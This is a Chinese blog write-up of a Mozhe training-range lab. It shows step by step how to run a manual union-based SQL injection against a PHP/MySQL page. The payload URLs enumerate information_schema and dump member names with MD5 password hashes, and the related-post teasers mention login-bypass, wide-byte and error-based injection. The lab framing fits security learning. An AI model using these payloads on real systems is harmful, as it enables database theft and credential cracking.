墨者sql注入漏洞测试习

最新推荐文章于 2024-07-28 19:10:22 发布
最新推荐文章于 2024-07-28 19:10:22 发布
阅读量38 收藏
点赞数
分类专栏: vulhub靶场 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/san3144393495/article/details/130257642
版权

墨者sql注入漏洞测试习

判断注入

猜解列名数量(字段数) : order by 这里就是在网站末尾加上order by1,网站正常在order by2,网站正常在order by3,以此类推知道网站不正常就知道有多少个字段数,最好网站不正常的那个数字前一个数字就是字段数。

猜解准备

213.15349 221 48354/mew lst php?id= -1 and 2=2222 union select 1.2.3.4,,目的是让网站报错看看能下出来的数字是几,就在几哪里修改成我们想要的语法,只有让他显示出来外面才能知道。

 报错的显示出来的是2.3。

信息收集,下面这些是数据库语,数据库规定的

数据库版本:version()    5.7.22-0ubuntu0.16.04.1

数据库名字:database()  mozhe_Discuz_StormGroup

数据库用户:user()   root@localhost

操作系统:@@version_compile_os    linux

 通过,这个手段来获取我们上面所需要收集的信息。由于版本是5.7高于5.0是高版本就可以使用informationschema有据查询,

查询到了这个网站的表

也可以写为http://219.153.49.228:43123/new_list.php?id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’ 搜搜的结果是一样的。
原文链接:https://blog.csdn.net/RichUee/article/details/128172756where是条件的意思,这句语法的意思要查询nformation_schema.tables中表名是table_name的信息条件是数据库名是mozhe。。。;结果查询到表名在查询列名

 http://219.153.49.228:43123/new_list.php?id=-1 union select 1,column_name,3,4 from information_schema.columns where table_name=‘StormGroup_member’。

语法跟上面的意思差不多,只不过查询的column_name

结果

 

 知道列名的信息就可以查询指定列的信息了

http://219.153.49.228:43123/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member 

 下面出现的那串md5加密的的root密码。加解密一下就可以获得密码。

上线之叁
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者靶场 post ,DB2,绕过登录,sql注入四关
07-22
通关攻略墨者靶场 post ,DB2,绕过登录,sql注入四关
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
墨者SQL注入漏洞测试(HTTP头注入)
wswr的博客
03-10 806
思路:根据题设吧,那肯定是往http的字段注入了,那就是看看分别啥字段,然后挨个试试注入语句试试,然后吧就会发现注入点(事实上这题最难的地方就是发现注入点,我感觉嗷) sql注入HTTP头部注入_hhhshd的博客-CSDN博客 看完这俩大哥思路应该就清晰了 原理:大概就是服务器端用函数抓取头部验证时,没有做什么限制,这样很危险,使得我们可以通过抓包修改字段内容来注入 点进去再说咯 刷新抓包,然后送到Repeatr那开始试注入点 反正就每个头部都加上 万能的 admin' or ..
墨者SQL注入漏洞测试(宽字节)
wswr的博客
03-10 708
原理:就是用%df去吃掉转义字符 / ,然后就可以正常注入了 思路:还是一样找注入点,过一下,就是找页面源码找注入点,然后什么get啊post什么xff什么的都试试,最后是宽字节的,所以按照题设就是在可能出现注入的页面加上 %df%27(%27 就是 ’) 然后会发现报错,然后开始一步步注入咯 登入 找注入点通过查看页面源码(突然想到还有一种方法找注入页面,就是用F12然后去找跳转链接有没有存在注入页面,与本题无关QAQ) 然后就%df%27咯,发现注入点 order by 从1..
墨者SQL注入漏洞测试(delete注入)
zr1213159840的博客
12-14 437
这题是看了别人的思路才知道的,还是要多加学呀。 首先是界面点进去后,点击留言发现会留言在界面上,我一直以为这个框子存在注入。结果不是的。 正确的姿势是留言后点击鼠标放在删除按钮上会在左下角出现删除的链接,其实想想也是,写入应该是insert注入才对啊。 那么我们是可以直接在链接上进行测试的 id=1 and 1=1--+ 试试 1=1和1=2测试后,发现是存在注入的,那么我们就从报错开始。 id=1 and (updatexml(1,concat(0x7e,(select database()),0
墨者SQL注入漏洞测试(登录绕过)解题方法
weixin_45790890的博客
07-22 90
一位网站管理员声称自己的管理员密码设置的十分复杂,是不可能被破解的;没想到被渗透测试人员一举拿下,请你也帮他试试看能不能登录管理员账户。2、掌握数据库和网页的注释符;3直接用户名输入admin’#1、了解常用网站万能密码;登录绕过一般的语法格式如下。利用万能密码绕过登录验证。2,利用万能密码登录绕过。密码随便输入什么都行。
墨者SQL注入漏洞测试(布尔盲注)
weixin_48621644的博客
09-15 966
小羊学安全 任重而道远~
墨者学院SQL注入漏洞测试(POST)
qq_48368964的博客
07-22 270
声明:该文章中的步骤及思路都是作者八方的阶解题思路,并非最优解,仅供参考墨者学院简介:WEB业务系统中,POST方式提交数据很常见,如登录框、留言评论等可能都会用到,这种与GET方式其实差别不大,一样会存在SQL注入漏洞。试试吧!实训目标:1、掌握POST提交数据方式;2、掌握POST方式的SQL注入;3、了解MySQL数据库的结构;4、了解SQL注入产生的原理;5、了解SQL注入可能产生的地方;解题方向:通过POST方式进行SQL注入,获取数据库的账户密码;
墨者学院01 SQL手工注入漏洞测试(MySQL数据库)
weixin_42789937的博客
01-24 472
墨者学院01 SQL手工注入漏洞测试(MySQL数据库),小白友好的SQL实战~
墨者学院】SQL注入漏洞测试(POST)
weixin_57240513的博客
07-22 405
WEB业务系统中,POST方式提交数据很常见,如登录框、留言评论等可能都会用到,这种与GET方式其实差。
墨者学院】SQL注入漏洞测试(登录绕过)
muyuchen110的博客
07-22 148
一位网站管理员声称自己的管理员密码设置的十分复杂,是不可能被破解的;没想到被渗透测试人员一举拿下,请你也帮他试试看能不能登录管理员账户。
墨者SQL过滤字符后手工注入漏洞测试(第3题)
wswr的博客
03-18 934
思路:首先试一下单引号先,发现报错,这里发现报错就能用报错注入的方式解决,具体操作看别的(用这种方法我是成功了),然后按照普通注入的正常玩法的话,发现注入点,判断这应该是字符型,然后试着闭合,发现也可以,欸,那就是正常注入了 总结:先判断注入点,注入类型,然后正常一套操作,order by不行就再试试select,(实在不行报错注入的方法也能做),然后就算遇到特殊字符的库名表名要注意用编码,还有反单引号的应用 ps:关于反单引号的知识点【原本是拿来防止把正常的字符当成保留字符,即 别把表名为sele
spring IOC实现(墨者革离)
12-12
在这个名为"spring_IOC实现(墨者革离)"的项目中,我们可以通过模拟城门叩问的编剧场景来理解这一概念。 首先,控制反转的基本思想是将对象的创建和依赖关系的管理从应用程序中分离出来,交给一个外部容器(在...
墨者未必黑.pdf
12-26
墨者未必黑.pdf
墨者安全专家 v3.7.2.9
03-12
3、墨者漏洞修补 通过全面扫描windows和软件中存在的系统漏洞,一键完成补丁的下载与安装,及时排除系统的安全隐患。 4、墨者保护隐私 及时清理上网历史记录、网银注册信息、系统临时文件及cookies等,全面保护个人...
数据库查询与操作指南-以Nebula图数据库为例
DZSpace,专注于计算机科学与技术领域的技术博主,致力于分享实用知识与技巧,帮助读者快速掌握技术要点,共同探索计算机世界的无限可能。欢迎访问DZSpace的博客,一起学习进步!
07-26 323
数据库查询与操作指南-以Nebula图数据库为例
ODBC连接达梦数据库
qq_55187735的博客
07-24 307
用户执行,因为环境变量配置在。
已经10岁的K8S,在很多方面仍需努力
最新发布
u012516914的专栏
07-28 255
/ K8S 已经 10 岁了,但仍然有许多方面要继续努力 /Kubernetes 于 2014 年 6 月推出,自那时起,它在推广云原生应用设计和支持更多微服务部署方面发挥了巨大作用。容器部署的增长非常迅速,而 Kubernetes 对于企业管理这些部署至关重要——根据 CNCF 上一份报告的调查结果,84% 的组织正在使用或评估 Kubernetes,而 66% 的潜在和实际消费者在生产中使用 ...
SQL基础入门:解锁数据库管理的钥匙
WayneYalejk的博客
07-26 472
在数字化时代,数据已成为企业最宝贵的资产之一。为了高效地存储、查询和管理这些数据,SQL(Structured Query Language,结构化查询语言)应运而生。SQL不仅是数据库管理员的必备技能,也是数据分析师、开发人员等多个领域从业者的重要工具。本文将带您踏入SQL的世界,从基础概念到实际应用,一步步解锁数据库管理的钥匙。强调SQL在数据处理和分析中的重要性,鼓励读者通过实践不断深化对SQL的理解和应用。
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究和技术推广。其中,手工注入漏洞测试是他们的一项重要工作之一。 在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标网站进行攻击,以确定是否存在注入漏洞,并尝试获取敏感信息。 在手工注入的过程中,墨者安全团队通常会使用一些工具来辅助测试,例如Burp Suite、SQLMap等。同时,他们也会根据目标网站的具体情况进行一些自定义的测试,以提高测试效果。 总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值